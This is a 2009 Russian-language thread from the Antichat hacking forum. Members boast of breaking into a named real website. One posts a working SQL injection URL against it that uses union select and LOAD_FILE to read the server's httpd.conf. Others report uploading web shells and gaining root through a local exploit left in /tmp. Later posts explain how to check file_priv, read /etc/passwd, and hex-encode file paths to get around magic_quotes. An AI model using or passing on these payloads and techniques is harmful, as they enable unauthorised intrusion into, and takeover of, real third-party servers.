Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.07.2009, 13:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл
если не жалко то закройте тему с этой скулей 
P.S.S
за 3 минуты мой рекорд  нашел и путь и залил шелл
uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM
Последний раз редактировалось HAXTA4OK; 28.07.2009 в 13:20..
|
|
|
28.07.2009, 13:26
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
если не жалко то закройте тему с этой скулей
Нельзя так... Если ты успел - сразу закрывать, да?
|
|
|
|
28.07.2009, 13:34
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от HAXTA4OK
P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл
если не жалко то закройте тему с этой скулей
P.S.S
за 3 минуты мой рекорд нашел и путь и залил шелл
uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM
Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать.
Последний раз редактировалось nub-hacker; 28.07.2009 в 13:46..
|
|
|
|
28.07.2009, 13:36
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9--
ищи тута  |
|
|
|
28.07.2009, 13:55
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Ура. первый раз в жизни залил шелл через SQL. кстати там прав на запись нет. так что лейте шеллы, но деф не сделаеете )))
|
|
|
|
28.07.2009, 16:13
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать.
А он там и не прокатит, там каждый раз содержание запроса в сорцах есть, надо доделывать и под такие ситуации |
|
|
|
28.07.2009, 16:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
а вот брутить иногда надо))то что я тебе дал путь , это чисто повезло что с 3 раза нашел конфиг файл))
|
|
|
|
28.07.2009, 16:47
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Раз ушо на то пошло.
К теме nub-hacker
Код:
uid=0(root) gid=0(root) groups=48(apache) context=root:system_r:initrc_t
в /tmp лежит сплоит. |
|
|
|
28.07.2009, 17:17
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Код:
1 file_priv (возможность чтения/записи файлов)
Проверяется это так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
'имя юзера'- это имя того юзера под которым работает база, т.е. то, что выводится по запросу:
union+select+user()
но без хоста. Тоесть если вывело root@localhost, то юзер root
Значения два, либо "Y"-повезло, либо "N", соответственно неповезло
Можно не заморачиваться и сразу попробовать прочитать файл:
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user
если вывело, нужные привелегии у вашего юзера есть
Как я понял это для БД версии 4
А как проверить в 5-ой версии? |
|
|
|
28.07.2009, 17:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
тоже самое, только на мой взгляд, чтобы не заморачиваться, правильнее делать так:
load_file(0x2f6574632f706173737764) - если linux
или
load_file(0x633a2f626f6f742e696e69) - если win
т.к. magic_quotes может быть ON.
ЗЫЖ
1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал
2. Если user() не root - это еще ничего не значит. Каждый 30-ый примерно все равно имеет file_priv=Y (т.е. проверять надо всех подряд, любую скулю)
Последний раз редактировалось Pashkela; 28.07.2009 в 17:35..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
